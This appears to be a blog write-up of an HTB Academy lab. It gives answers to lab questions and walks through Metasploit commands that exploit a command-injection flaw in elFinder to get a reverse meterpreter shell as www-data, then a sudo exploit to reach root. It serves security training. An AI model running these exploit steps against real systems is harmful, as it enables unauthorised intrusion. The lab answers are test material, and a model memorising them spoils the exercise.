My HTB Academy unique referral link >>
Question N1:
The target has a specific web application running that we can find by looking into the HTML source code. What is the name of that web application?
Explore the web page at using a browser's devtools. Look for the name of the web application within the HTML source code, typically indicated in the tag.
Hint: You can use Chrome DevTools or Firefox DevTools for inspecting the HTML source code.
Answer N1: elFinder
Question N2:
Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with?
[★]$ msfconsole
[msf]>> search exploit elfinder
[msf] >> use 3
[msf] exploit(linux/http/elfinder_archive_cmd_injection) >> options
>> set RHOSTS <target ip>
>> set LHOST tun0
>> set LPORT 4444
>> set payload linux/x64/meterpreter/reverse_tcp
[msf]>>exploit(linux/http/elfinder_archive_cmd_injection) >> exploit
Answer2: The username of the user obtained with the shell is www-data.
Question N3:
The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer.
>> background (or Ctrl+Z)/ if session Died / use: >>exploit -j
>> search sudo
>> use 27
>> options
>> set LHOST tun0
>> set LPORT 1234
>> set payload linux/x64/meterpreter/reverse_tcp
>> sessions
>> set session 3
>> exploit
Great, now we are root!
Top comments (0)